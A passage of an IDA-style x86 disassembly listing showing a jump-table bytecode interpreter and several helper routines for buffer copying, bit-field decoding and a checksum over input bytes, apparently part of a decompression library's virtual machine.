; jumptable 009B3060 case 39
jmp short loc_9B3299 ; jumptable 009B3060 case 8
; ---------------------------------------------------------------------------
loc_9B3289: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
test byte ptr [edi+24h], 3 ; jumptable 009B3060 case 17
jmp short loc_9B3293
; ---------------------------------------------------------------------------
loc_9B328F: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
test byte ptr [edi+24h], 1 ; jumptable 009B3060 case 18
loc_9B3293: ; CODE XREF: sub_9B300B+173�j
; sub_9B300B+26A�j ...
jnz loc_9B3617 ; default
; jumptable 009B3060 case 39
loc_9B3299: ; CODE XREF: sub_9B300B+55�j
; sub_9B300B+27C�j
; DATA XREF: ...
mov esi, [esi] ; jumptable 009B3060 case 8
cmp esi, [ebp+arg_4]
jnb loc_9B362E
dec [ebp+var_4]
cmp [ebp+var_4], 0
jle loc_9B3032
lea eax, [esi+esi*4]
lea ebx, [edx+eax*8]
jmp loc_9B361D
; ---------------------------------------------------------------------------
loc_9B32BC: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
add dword ptr [edi+20h], 0FFFFFFFCh ; jumptable 009B3060 case 19
mov edx, [esi]
jmp loc_9B3484
; ---------------------------------------------------------------------------
loc_9B32C7: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
mov eax, [edi+20h] ; jumptable 009B3060 case 20
mov ecx, [edi]
and eax, 3FFFFh
mov eax, [eax+ecx]
mov [esi], eax
add dword ptr [edi+20h], 4
jmp loc_9B3617 ; default
; jumptable 009B3060 case 39
; ---------------------------------------------------------------------------
loc_9B32DF: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
mov eax, ebx ; jumptable 009B3060 case 21
sub eax, [ebp+arg_0]
push 28h
cdq
pop ebx
idiv ebx
add dword ptr [edi+20h], 0FFFFFFFCh
mov ecx, [edi+20h]
mov edx, [edi]
and ecx, 3FFFFh
inc eax
mov [ecx+edx], eax
mov esi, [esi]
cmp esi, [ebp+arg_4]
jnb loc_9B362E
dec [ebp+var_4]
cmp [ebp+var_4], 0
jle loc_9B3032
mov ecx, [ebp+arg_0]
lea eax, [esi+esi*4]
lea ebx, [ecx+eax*8]
jmp loc_9B361D
; ---------------------------------------------------------------------------
loc_9B3323: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
cmp dword ptr [ebx+4], 0 ; jumptable 009B3060 case 23
jz short loc_9B3333
movzx eax, byte ptr [esi]
not al
jmp loc_9B3544
; ---------------------------------------------------------------------------
loc_9B3333: ; CODE XREF: sub_9B300B+31C�j
mov eax, [esi]
not eax
jmp loc_9B3077
; ---------------------------------------------------------------------------
loc_9B333C: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
mov ebx, [ebx+4] ; jumptable 009B3060 case 24
test ebx, ebx
jz short loc_9B3348
movzx eax, byte ptr [esi]
jmp short loc_9B334A
; ---------------------------------------------------------------------------
loc_9B3348: ; CODE XREF: sub_9B300B+336�j
mov eax, [esi]
loc_9B334A: ; CODE XREF: sub_9B300B+33B�j
test ebx, ebx
jz short loc_9B3353
movzx ecx, byte ptr [esi]
jmp short loc_9B3355
; ---------------------------------------------------------------------------
loc_9B3353: ; CODE XREF: sub_9B300B+341�j
mov ecx, [esi]
loc_9B3355: ; CODE XREF: sub_9B300B+346�j
mov edx, eax
shl edx, cl
test edx, edx
jnz short loc_9B3362
push 2
pop ebx
jmp short loc_9B336A
; ---------------------------------------------------------------------------
loc_9B3362: ; CODE XREF: sub_9B300B+350�j
mov ebx, edx
and ebx, 80000000h
loc_9B336A: ; CODE XREF: sub_9B300B+355�j
dec ecx
shl eax, cl
shr eax, 1Fh
jmp short loc_9B33C5
; ---------------------------------------------------------------------------
loc_9B3372: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
mov ebx, [ebx+4] ; jumptable 009B3060 case 25
test ebx, ebx
jz short loc_9B337E
movzx eax, byte ptr [esi]
jmp short loc_9B3380
; ---------------------------------------------------------------------------
loc_9B337E: ; CODE XREF: sub_9B300B+36C�j
mov eax, [esi]
loc_9B3380: ; CODE XREF: sub_9B300B+371�j
test ebx, ebx
jz short loc_9B3389
movzx ecx, byte ptr [esi]
jmp short loc_9B338B
; ---------------------------------------------------------------------------
loc_9B3389: ; CODE XREF: sub_9B300B+377�j
mov ecx, [esi]
loc_9B338B: ; CODE XREF: sub_9B300B+37C�j
mov edx, eax
shr edx, cl
loc_9B338F: ; CODE XREF: sub_9B300B+3AA�j
test edx, edx
jnz short loc_9B33B7
push 2
pop ebx
jmp short loc_9B33BF
; ---------------------------------------------------------------------------
loc_9B3398: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
mov ebx, [ebx+4] ; jumptable 009B3060 case 26
test ebx, ebx
jz short loc_9B33A4
movzx eax, byte ptr [esi]
jmp short loc_9B33A6
; ---------------------------------------------------------------------------
loc_9B33A4: ; CODE XREF: sub_9B300B+392�j
mov eax, [esi]
loc_9B33A6: ; CODE XREF: sub_9B300B+397�j
test ebx, ebx
jz short loc_9B33AF
movzx ecx, byte ptr [esi]
jmp short loc_9B33B1
; ---------------------------------------------------------------------------
loc_9B33AF: ; CODE XREF: sub_9B300B+39D�j
mov ecx, [esi]
loc_9B33B1: ; CODE XREF: sub_9B300B+3A2�j
mov edx, eax
sar edx, cl
jmp short loc_9B338F
; ---------------------------------------------------------------------------
loc_9B33B7: ; CODE XREF: sub_9B300B+386�j
mov ebx, edx
and ebx, 80000000h
loc_9B33BF: ; CODE XREF: sub_9B300B+38B�j
dec ecx
shr eax, cl
and eax, 1
loc_9B33C5: ; CODE XREF: sub_9B300B+365�j
or eax, ebx
mov [edi+24h], eax
mov eax, [ebp+var_8]
cmp dword ptr [eax+4], 0
mov ebx, eax
jmp loc_9B35CC
; ---------------------------------------------------------------------------
loc_9B33D8: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
cmp dword ptr [ebx+4], 0 ; jumptable 009B3060 case 27
jz short loc_9B33E3
movzx eax, byte ptr [esi]
jmp short loc_9B33E5
; ---------------------------------------------------------------------------
loc_9B33E3: ; CODE XREF: sub_9B300B+3D1�j
mov eax, [esi]
loc_9B33E5: ; CODE XREF: sub_9B300B+3D6�j
neg eax
mov ecx, eax
jz loc_9B3229
and eax, 80000001h
or eax, 1
loc_9B33F7: ; CODE XREF: sub_9B300B+14F�j
; sub_9B300B+221�j ...
mov [edi+24h], eax
cmp dword ptr [ebx+4], 0
jz short loc_9B3407
mov [esi], cl
jmp loc_9B3617 ; default
; jumptable 009B3060 case 39
; ---------------------------------------------------------------------------
loc_9B3407: ; CODE XREF: sub_9B300B+3F3�j
mov [esi], ecx
jmp loc_9B3617 ; default
; jumptable 009B3060 case 39
; ---------------------------------------------------------------------------
loc_9B340E: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
neg byte ptr [esi] ; jumptable 009B3060 case 52
jmp loc_9B3617 ; default
; jumptable 009B3060 case 39
; ---------------------------------------------------------------------------
loc_9B3415: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
neg dword ptr [esi] ; jumptable 009B3060 case 53
jmp loc_9B3617 ; default
; jumptable 009B3060 case 39
; ---------------------------------------------------------------------------
loc_9B341C: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
mov eax, [edi+20h] ; jumptable 009B3060 case 28
sub eax, 4
lea ecx, [edi+4]
mov [ebp+var_C], 8
loc_9B342C: ; CODE XREF: sub_9B300B+439�j
mov ebx, [ecx]
mov esi, [edi]
mov edx, eax
and edx, 3FFFFh
add ecx, 4
sub eax, 4
dec [ebp+var_C]
mov [edx+esi], ebx
jnz short loc_9B342C
add dword ptr [edi+20h], 0FFFFFFE0h
mov ebx, [ebp+var_8]
jmp loc_9B3617 ; default
; jumptable 009B3060 case 39
; ---------------------------------------------------------------------------
loc_9B3452: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
lea eax, [edi+20h] ; jumptable 009B3060 case 29
mov ecx, [eax]
mov [ebp+var_C], 8
loc_9B345E: ; CODE XREF: sub_9B300B+46B�j
mov esi, [edi]
mov edx, ecx
and edx, 3FFFFh
mov edx, [edx+esi]
mov [eax], edx
sub eax, 4
add ecx, 4
dec [ebp+var_C]
jnz short loc_9B345E
jmp loc_9B3617 ; default
; jumptable 009B3060 case 39
; ---------------------------------------------------------------------------
loc_9B347D: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
add dword ptr [edi+20h], 0FFFFFFFCh ; jumptable 009B3060 case 30
mov edx, [edi+24h]
loc_9B3484: ; CODE XREF: sub_9B300B+2B7�j
mov eax, [edi+20h]
mov ecx, [edi]
and eax, 3FFFFh
mov [eax+ecx], edx
jmp loc_9B3617 ; default
; jumptable 009B3060 case 39
; ---------------------------------------------------------------------------
loc_9B3496: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
mov eax, [edi+20h] ; jumptable 009B3060 case 31
mov edx, [edi]
mov ecx, eax
and ecx, 3FFFFh
mov ecx, [ecx+edx]
add eax, 4
mov [edi+24h], ecx
mov [edi+20h], eax
jmp loc_9B3617 ; default
; jumptable 009B3060 case 39
; ---------------------------------------------------------------------------
loc_9B34B4: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
movzx eax, byte ptr [eax] ; jumptable 009B3060 case 32
jmp loc_9B3077
; ---------------------------------------------------------------------------
loc_9B34BC: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
movsx eax, byte ptr [eax] ; jumptable 009B3060 case 33
jmp loc_9B3077
; ---------------------------------------------------------------------------
loc_9B34C4: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
mov ecx, [ebx+4] ; jumptable 009B3060 case 34
test ecx, ecx
jz short loc_9B34D0
movzx edx, byte ptr [esi]
jmp short loc_9B34D2
; ---------------------------------------------------------------------------
loc_9B34D0: ; CODE XREF: sub_9B300B+4BE�j
mov edx, [esi]
loc_9B34D2: ; CODE XREF: sub_9B300B+4C3�j
test ecx, ecx
jz short loc_9B34DD
movzx ecx, byte ptr [eax]
mov [esi], cl
jmp short loc_9B34E1
; ---------------------------------------------------------------------------
loc_9B34DD: ; CODE XREF: sub_9B300B+4C9�j
mov ecx, [eax]
mov [esi], ecx
loc_9B34E1: ; CODE XREF: sub_9B300B+4D0�j
cmp dword ptr [ebx+4], 0
jz short loc_9B34EE
mov [eax], dl
jmp loc_9B3617 ; default
; jumptable 009B3060 case 39
; ---------------------------------------------------------------------------
loc_9B34EE: ; CODE XREF: sub_9B300B+4DA�j
mov [eax], edx
jmp loc_9B3617 ; default
; jumptable 009B3060 case 39
; ---------------------------------------------------------------------------
loc_9B34F5: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
mov edx, [ebx+4] ; jumptable 009B3060 case 35
test edx, edx
jz short loc_9B3501
movzx ecx, byte ptr [esi]
jmp short loc_9B3503
; ---------------------------------------------------------------------------
loc_9B3501: ; CODE XREF: sub_9B300B+4EF�j
mov ecx, [esi]
loc_9B3503: ; CODE XREF: sub_9B300B+4F4�j
test edx, edx
jz short loc_9B350C
movzx eax, byte ptr [eax]
jmp short loc_9B350E
; ---------------------------------------------------------------------------
loc_9B350C: ; CODE XREF: sub_9B300B+4FA�j
mov eax, [eax]
loc_9B350E: ; CODE XREF: sub_9B300B+4FF�j
imul eax, ecx
test edx, edx
jmp short loc_9B353E
; ---------------------------------------------------------------------------
loc_9B3515: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
mov edx, [ebx+4] ; jumptable 009B3060 case 36
test edx, edx
jz short loc_9B3521
movzx ecx, byte ptr [eax]
jmp short loc_9B3523
; ---------------------------------------------------------------------------
loc_9B3521: ; CODE XREF: sub_9B300B+50F�j
mov ecx, [eax]
loc_9B3523: ; CODE XREF: sub_9B300B+514�j
test ecx, ecx
jz loc_9B3617 ; default
; jumptable 009B3060 case 39
test edx, edx
jz short loc_9B3534
movzx eax, byte ptr [esi]
jmp short loc_9B3536
; ---------------------------------------------------------------------------
loc_9B3534: ; CODE XREF: sub_9B300B+522�j
mov eax, [esi]
loc_9B3536: ; CODE XREF: sub_9B300B+527�j
xor edx, edx
div ecx
cmp dword ptr [ebx+4], 0
loc_9B353E: ; CODE XREF: sub_9B300B+508�j
jz loc_9B3077
loc_9B3544: ; CODE XREF: sub_9B300B+65�j
; sub_9B300B+75�j ...
mov [esi], al
jmp loc_9B3617 ; default
; jumptable 009B3060 case 39
; ---------------------------------------------------------------------------
loc_9B354B: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
mov edx, [ebx+4] ; jumptable 009B3060 case 37
test edx, edx
jz short loc_9B3557
movzx ecx, byte ptr [esi]
jmp short loc_9B3559
; ---------------------------------------------------------------------------
loc_9B3557: ; CODE XREF: sub_9B300B+545�j
mov ecx, [esi]
loc_9B3559: ; CODE XREF: sub_9B300B+54A�j
mov [ebp+var_8], ecx
mov ecx, [edi+24h]
and ecx, 1
test edx, edx
jz short loc_9B356B
movzx eax, byte ptr [eax]
jmp short loc_9B356D
; ---------------------------------------------------------------------------
loc_9B356B: ; CODE XREF: sub_9B300B+559�j
mov eax, [eax]
loc_9B356D: ; CODE XREF: sub_9B300B+55E�j
lea edx, [eax+ecx]
add edx, [ebp+var_8]
jnz short loc_9B357A
loc_9B3575: ; CODE XREF: sub_9B300B+5A7�j
push 2
pop eax
jmp short loc_9B35C5
; ---------------------------------------------------------------------------
loc_9B357A: ; CODE XREF: sub_9B300B+568�j
cmp edx, [ebp+var_8]
jb short loc_9B35B9
loc_9B357F: ; CODE XREF: sub_9B300B+5AC�j
jnz short loc_9B3585
test ecx, ecx
jnz short loc_9B35B9
loc_9B3585: ; CODE XREF: sub_9B300B:loc_9B357F�j
xor ecx, ecx
jmp short loc_9B35BC
; ---------------------------------------------------------------------------
loc_9B3589: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
mov edx, [ebx+4] ; jumptable 009B3060 case 38
test edx, edx
jz short loc_9B3595
movzx ecx, byte ptr [esi]
jmp short loc_9B3597
; ---------------------------------------------------------------------------
loc_9B3595: ; CODE XREF: sub_9B300B+583�j
mov ecx, [esi]
loc_9B3597: ; CODE XREF: sub_9B300B+588�j
mov [ebp+var_8], ecx
mov ecx, [edi+24h]
and ecx, 1
test edx, edx
jz short loc_9B35A9
movzx eax, byte ptr [eax]
jmp short loc_9B35AB
; ---------------------------------------------------------------------------
loc_9B35A9: ; CODE XREF: sub_9B300B+597�j
mov eax, [eax]
loc_9B35AB: ; CODE XREF: sub_9B300B+59C�j
mov edx, [ebp+var_8]
sub edx, eax
sub edx, ecx
jz short loc_9B3575
cmp edx, [ebp+var_8]
jbe short loc_9B357F
loc_9B35B9: ; CODE XREF: sub_9B300B+572�j
; sub_9B300B+578�j
xor ecx, ecx
inc ecx
loc_9B35BC: ; CODE XREF: sub_9B300B+57C�j
mov eax, edx
and eax, 80000000h
or eax, ecx
loc_9B35C5: ; CODE XREF: sub_9B300B+56D�j
mov [edi+24h], eax
cmp dword ptr [ebx+4], 0
loc_9B35CC: ; CODE XREF: sub_9B300B+3C8�j
jz short loc_9B35D2
mov [esi], dl
jmp short loc_9B3617 ; default
; jumptable 009B3060 case 39
; ---------------------------------------------------------------------------
loc_9B35D2: ; CODE XREF: sub_9B300B:loc_9B35CC�j
mov [esi], edx
jmp short loc_9B3617 ; default
; jumptable 009B3060 case 39
; ---------------------------------------------------------------------------
loc_9B35D6: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
mov ecx, [edi+20h] ; jumptable 009B3060 case 22
cmp ecx, 40000h
jnb short loc_9B362E
mov esi, [edi]
mov eax, ecx
and eax, 3FFFFh
mov eax, [eax+esi]
cmp eax, [ebp+arg_4]
jnb short loc_9B362E
dec [ebp+var_4]
cmp [ebp+var_4], 0
jle loc_9B3032
lea eax, [eax+eax*4]
add ecx, 4
lea ebx, [edx+eax*8]
mov [edi+20h], ecx
jmp short loc_9B361D
; ---------------------------------------------------------------------------
loc_9B360D: ; CODE XREF: sub_9B300B+55�j
; DATA XREF: .text:off_9B3637�o
mov ecx, [ebx+10h] ; jumptable 009B3060 case 54
mov eax, edi
call sub_9B2B17
loc_9B3617: ; CODE XREF: sub_9B300B+4F�j
; sub_9B300B+55�j ...
add ebx, 28h ; default
; jumptable 009B3060 case 39
dec [ebp+var_4]
loc_9B361D: ; CODE XREF: sub_9B300B+2AC�j
; sub_9B300B+313�j ...
cmp ebx, [ebp+var_10]
mov [ebp+var_8], ebx
jbe loc_9B3038
jmp loc_9B3032
; ---------------------------------------------------------------------------
loc_9B362E: ; CODE XREF: sub_9B300B+293�j
; sub_9B300B+2F7�j ...
xor eax, eax
inc eax
jmp loc_9B3034
sub_9B300B endp
; ---------------------------------------------------------------------------
db 90h
off_9B3637 dd offset loc_9B3067, offset loc_9B3085, offset loc_9B30ED
; DATA XREF: sub_9B300B+55�r
dd offset loc_9B3127, offset loc_9B3171, offset loc_9B317A ; jump table for switch statement
dd offset loc_9B3183, offset loc_9B31AB, offset loc_9B3299
dd offset loc_9B31D0, offset loc_9B31ED, offset loc_9B320A
dd offset loc_9B323D, offset loc_9B326B, offset loc_9B3271
dd offset loc_9B3277, offset loc_9B327D, offset loc_9B3289
dd offset loc_9B328F, offset loc_9B32BC, offset loc_9B32C7
dd offset loc_9B32DF, offset loc_9B35D6, offset loc_9B3323
dd offset loc_9B333C, offset loc_9B3372, offset loc_9B3398
dd offset loc_9B33D8, offset loc_9B341C, offset loc_9B3452
dd offset loc_9B347D, offset loc_9B3496, offset loc_9B34B4
dd offset loc_9B34BC, offset loc_9B34C4, offset loc_9B34F5
dd offset loc_9B3515, offset loc_9B354B, offset loc_9B3589
dd offset loc_9B3617, offset loc_9B307E, offset loc_9B3075
dd offset loc_9B30BF, offset loc_9B30E5, offset loc_9B3115
dd offset loc_9B311E, offset loc_9B315F, offset loc_9B3168
dd offset loc_9B319D, offset loc_9B31A4, offset loc_9B31C2
dd offset loc_9B31C9, offset loc_9B340E, offset loc_9B3415
dd offset loc_9B360D
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B3713(int, size_t Size)
sub_9B3713 proc near ; CODE XREF: sub_9AF448+53�p
arg_0 = dword ptr 8
Size = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+Size]
push edi
mov edi, [ebp+arg_0]
push 1Ch ; Size
lea eax, [esi+24h]
push eax ; Src
lea eax, [edi+4]
push eax ; Dst
call memcpy
mov eax, [esi+18h]
mov ebx, 2000h
add esp, 0Ch
cmp eax, ebx
mov [ebp+Size], eax
jl short loc_9B3743
mov [ebp+Size], ebx
loc_9B3743: ; CODE XREF: sub_9B3713+2B�j
cmp [ebp+Size], 0
jz short loc_9B375F
push [ebp+Size] ; Size
mov eax, [edi]
push dword ptr [esi+0Ch] ; Src
add eax, 3C000h
push eax ; Dst
call memcpy
add esp, 0Ch
loc_9B375F: ; CODE XREF: sub_9B3713+34�j
mov ecx, [ebp+Size]
mov eax, [esi+1Ch]
sub ebx, ecx
cmp eax, ebx
jb short loc_9B376D
mov eax, ebx
loc_9B376D: ; CODE XREF: sub_9B3713+56�j
test eax, eax
jz short loc_9B3787
push eax ; Size
mov eax, [edi]
push dword ptr [esi+10h] ; Src
lea eax, [eax+ecx+3C000h]
push eax ; Dst
call memcpy
add esp, 0Ch
loc_9B3787: ; CODE XREF: sub_9B3713+5C�j
and dword ptr [edi+24h], 0
mov dword ptr [edi+20h], 40000h
mov eax, [esi+8]
test eax, eax
mov ebx, eax
jnz short loc_9B379D
mov ebx, [esi]
loc_9B379D: ; CODE XREF: sub_9B3713+86�j
test ebx, ebx
jz loc_9B3830
push dword ptr [esi+20h]
push ebx
call sub_9B300B
test eax, eax
pop ecx
pop ecx
jnz short loc_9B37BA
mov dword ptr [ebx], 16h
loc_9B37BA: ; CODE XREF: sub_9B3713+9F�j
mov edx, [edi]
mov ecx, [edx+3C020h]
mov eax, [edx+3C01Ch]
mov ebx, 3FFFFh
and ecx, ebx
and eax, ebx
lea ebx, [eax+ecx]
cmp ebx, 40000h
jb short loc_9B37E0
xor eax, eax
xor ecx, ecx
loc_9B37E0: ; CODE XREF: sub_9B3713+C7�j
mov [esi+40h], eax
mov eax, [esi+0Ch]
add edx, ecx
test eax, eax
mov [esi+14h], edx
jz short loc_9B37FF
push eax ; Memory
call free
and dword ptr [esi+0Ch], 0
and dword ptr [esi+18h], 0
pop ecx
loc_9B37FF: ; CODE XREF: sub_9B3713+DA�j
mov eax, [edi]
mov ebx, [eax+3C030h]
mov eax, 2000h
cmp ebx, eax
jb short loc_9B3812
mov ebx, eax
loc_9B3812: ; CODE XREF: sub_9B3713+FB�j
test ebx, ebx
jz short loc_9B384A
lea eax, [ebx+40h]
add [esi+18h], eax
push dword ptr [esi+18h] ; NewSize
push dword ptr [esi+0Ch] ; Memory
call sub_9B132C
test eax, eax
pop ecx
pop ecx
mov [esi+0Ch], eax
jnz short loc_9B3834
loc_9B3830: ; CODE XREF: sub_9B3713+8C�j
xor eax, eax
jmp short loc_9B384D
; ---------------------------------------------------------------------------
loc_9B3834: ; CODE XREF: sub_9B3713+11B�j
mov ecx, [edi]
add ebx, 40h
push ebx ; Size
add ecx, 3C000h
push ecx ; Src
push eax ; Dst
call memcpy
add esp, 0Ch
loc_9B384A: ; CODE XREF: sub_9B3713+101�j
xor eax, eax
inc eax
loc_9B384D: ; CODE XREF: sub_9B3713+11F�j
pop edi
pop esi
pop ebx
pop ebp
retn
sub_9B3713 endp
; =============== S U B R O U T I N E =======================================
sub_9B3852 proc near ; CODE XREF: sub_9B3A12+20D�p
; sub_9B3A12+222�p
arg_0 = dword ptr 4
push esi
call sub_9B283A
test ah, ah
pop ecx
jns short loc_9B3878
and dword ptr [edi+4], 0
shr eax, 0Ch
and eax, 7
mov [edi+8], eax
lea eax, [ebx+eax*4+4]
mov [edi], eax
mov eax, [esi+0Ch]
add eax, 4
jmp short loc_9B389C
; ---------------------------------------------------------------------------
loc_9B3878: ; CODE XREF: sub_9B3852+9�j
test ah, 0C0h
jnz short loc_9B38C9
cmp [esp+arg_0], 0
mov dword ptr [edi+4], 1
jz short loc_9B38AB
shr eax, 6
and eax, 0FFh
mov [edi+8], eax
mov eax, [esi+0Ch]
add eax, 0Ah
loc_9B389C: ; CODE XREF: sub_9B3852+24�j
; sub_9B3852+9C�j
mov ecx, eax
sar ecx, 3
add [esi+8], ecx
and eax, 7
mov [esi+0Ch], eax
retn
; ---------------------------------------------------------------------------
loc_9B38AB: ; CODE XREF: sub_9B3852+37�j
mov eax, [esi+0Ch]
inc eax
inc eax
mov ecx, eax
sar ecx, 3
add [esi+8], ecx
and eax, 7
push esi
mov [esi+0Ch], eax
call sub_9B2868
mov [edi+8], eax
pop ecx
retn
; ---------------------------------------------------------------------------
loc_9B38C9: ; CODE XREF: sub_9B3852+29�j
test ah, 20h
mov dword ptr [edi+4], 2
jnz short loc_9B38F0
and dword ptr [edi+0Ch], 0
shr eax, 0Ah
and eax, 7
mov [edi+8], eax
lea eax, [ebx+eax*4+4]
mov [edi], eax
mov eax, [esi+0Ch]
add eax, 6
jmp short loc_9B389C
; ---------------------------------------------------------------------------
loc_9B38F0: ; CODE XREF: sub_9B3852+81�j
test ah, 10h
jnz short loc_9B390C
shr eax, 9
and eax, 7
mov [edi+8], eax
lea eax, [ebx+eax*4+4]
mov [edi], eax
mov eax, [esi+0Ch]
add eax, 7
jmp short loc_9B3916
; ---------------------------------------------------------------------------
loc_9B390C: ; CODE XREF: sub_9B3852+A1�j
and dword ptr [edi+8], 0
mov eax, [esi+0Ch]
add eax, 4
loc_9B3916: ; CODE XREF: sub_9B3852+B8�j
mov ecx, eax
sar ecx, 3
add [esi+8], ecx
and eax, 7
push esi
mov [esi+0Ch], eax
call sub_9B2868
mov [edi+0Ch], eax
pop ecx
retn
sub_9B3852 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9B392F proc near ; CODE XREF: sub_9B3A12+2F2�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
mov eax, [ecx]
mov ecx, [ecx+20h]
test ecx, ecx
jle locret_9B3A10
push ebx
push esi
mov [ebp+var_4], 1
mov [ebp+var_8], ecx
push edi
loc_9B394E: ; CODE XREF: sub_9B392F+D8�j
mov esi, [eax]
mov edx, esi
sub edx, 0
jz loc_9B39F2
dec edx
jz loc_9B39E6
test ds:byte_9B9DC0[esi], 40h
jz loc_9B39FE
mov edi, [ebp+var_4]
cmp edi, ecx
jge short loc_9B3994
lea edx, [eax+28h]
loc_9B3979: ; CODE XREF: sub_9B392F+63�j
mov ebx, [edx]
movzx ebx, ds:byte_9B9DC0[ebx]
test bl, 38h
jnz short loc_9B39FE
test bl, 40h
jnz short loc_9B3994
inc edi
add edx, 28h
cmp edi, ecx
jl short loc_9B3979
loc_9B3994: ; CODE XREF: sub_9B392F+45�j
; sub_9B392F+5B�j
mov edx, esi
dec edx
dec edx
jz short loc_9B39DA
dec edx
jz short loc_9B39CE
sub edx, 3
jz short loc_9B39C2
dec edx
jz short loc_9B39B6
sub edx, 14h
jnz short loc_9B39FE
mov edx, [eax+4]
neg edx
sbb edx, edx
add edx, 35h
jmp short loc_9B39FC
; ---------------------------------------------------------------------------
loc_9B39B6: ; CODE XREF: sub_9B392F+74�j
mov edx, [eax+4]
neg edx
sbb edx, edx
add edx, 33h
jmp short loc_9B39FC
; ---------------------------------------------------------------------------
loc_9B39C2: ; CODE XREF: sub_9B392F+71�j
mov edx, [eax+4]
neg edx
sbb edx, edx
add edx, 31h
jmp short loc_9B39FC
; ---------------------------------------------------------------------------
loc_9B39CE: ; CODE XREF: sub_9B392F+6C�j
mov edx, [eax+4]
neg edx
sbb edx, edx
add edx, 2Fh
jmp short loc_9B39FC
; ---------------------------------------------------------------------------
loc_9B39DA: ; CODE XREF: sub_9B392F+69�j
mov edx, [eax+4]
neg edx
sbb edx, edx
add edx, 2Dh
jmp short loc_9B39FC
; ---------------------------------------------------------------------------
loc_9B39E6: ; CODE XREF: sub_9B392F+2D�j
mov edx, [eax+4]
neg edx
sbb edx, edx
add edx, 2Bh
jmp short loc_9B39FC
; ---------------------------------------------------------------------------
loc_9B39F2: ; CODE XREF: sub_9B392F+26�j
mov edx, [eax+4]
neg edx
sbb edx, edx
add edx, 29h
loc_9B39FC: ; CODE XREF: sub_9B392F+85�j
; sub_9B392F+91�j ...
mov [eax], edx
loc_9B39FE: ; CODE XREF: sub_9B392F+3A�j
; sub_9B392F+56�j ...
add eax, 28h
inc [ebp+var_4]
dec [ebp+var_8]
jnz loc_9B394E
pop edi
pop esi
pop ebx
locret_9B3A10: ; CODE XREF: sub_9B392F+C�j
leave
retn
sub_9B392F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_9B3A12(int, int, void *Src, int, int)
sub_9B3A12 proc near ; CODE XREF: sub_9AFBCB+30C�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
Src = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
push ebx
mov ebx, [ebp+arg_C]
push esi
mov esi, [ebp+arg_4]
and dword ptr [esi+0Ch], 0
and dword ptr [esi+8], 0
mov eax, 8000h
cmp ebx, eax
push edi
jge short loc_9B3A32
mov eax, ebx
loc_9B3A32: ; CODE XREF: sub_9B3A12+1C�j
mov edi, [ebp+Src]
push eax ; Size
push edi ; Src
push dword ptr [esi] ; Dst
call memcpy
xor eax, eax
inc eax
add esp, 0Ch
xor cl, cl
cmp ebx, eax
jle short loc_9B3A52
loc_9B3A4A: ; CODE XREF: sub_9B3A12+3E�j
xor cl, [eax+edi]
inc eax
cmp eax, ebx
jl short loc_9B3A4A
loc_9B3A52: ; CODE XREF: sub_9B3A12+36�j
mov eax, [esi+0Ch]
mov ebx, [ebp+arg_10]
add eax, 8
mov edx, eax
sar edx, 3
add [esi+8], edx
and eax, 7
mov [esi+0Ch], eax
and dword ptr [ebx+20h], 0
cmp cl, [edi]
jnz loc_9B3C9B
push edi
mov edi, [ebp+arg_C]
call sub_9B2968
mov edi, eax
test edi, edi
pop ecx
jz short loc_9B3ABF
push 1
push ebx
call sub_9B11E7
mov edx, [ebx]
pop ecx
pop ecx
mov ecx, [ebx+20h]
lea eax, [ecx+ecx*4]
lea eax, [edx+eax*8]
inc ecx
and [ebp+arg_C], 0
mov [ebx+20h], ecx
lea ecx, [eax+10h]
mov [ecx], edi
mov [eax+8], ecx
lea ecx, [eax+20h]
push 3
mov [eax+18h], ecx
pop ecx
mov dword ptr [eax], 36h
mov [eax+1Ch], ecx
mov [eax+0Ch], ecx
loc_9B3ABF: ; CODE XREF: sub_9B3A12+71�j
push esi
call sub_9B283A
pop ecx
mov ecx, [esi+0Ch]
inc ecx
mov edx, ecx
sar edx, 3
add [esi+8], edx
and ecx, 7
test ah, ah
mov [esi+0Ch], ecx
jns loc_9B3C8F
push esi
call sub_9B2868
mov edi, eax
inc edi
push edi ; Size
mov [ebp+Src], edi
call sub_9B1311
test eax, eax
pop ecx
pop ecx
mov [ebx+10h], eax
jz short loc_9B3B66
mov eax, [esi+8]
and [ebp+arg_4], 0
